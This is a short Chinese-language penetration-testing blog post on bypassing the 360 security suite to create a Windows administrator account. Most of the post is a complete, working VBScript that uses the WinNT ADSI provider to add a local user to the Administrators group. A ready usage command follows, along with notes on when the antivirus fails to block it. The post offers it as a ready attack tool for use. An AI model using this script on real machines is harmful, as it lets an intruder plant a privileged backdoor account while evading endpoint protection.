ma4ter

熬过无人问津的日子才能拥有诗和远方.

Bypass360添加系统账户

渗透测试 0 评 747 读

利用下面的VBS脚本调用系统API直接添加管理员账户
只有在目标机器没开启核晶防护的时候有用 一般对付云虚拟机可以的 因为开不了核晶防护 开了核晶防护的机器360直接在ring0拦截(具体我也不知道)
大佬勿喷

看图吧




脚本:

struser=wscript.arguments(0)
strpass=wscript.arguments(1)

set lp=createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",struser)
od.SetPassword strpass
od.SetInfo
Set of=GetObject(oz&"/" & struser & ",user")
oe.Add(of.ADsPath)

For Each admin in oe.Members
if struser=admin.Name then
Wscript.echo struser & " 建立成功!"
wscript.quit
end if
Next

Wscript.echo struser & " 用户建立失败!"

用法:

cscript 1.vbs admin admin
快来做第一个评论的人吧~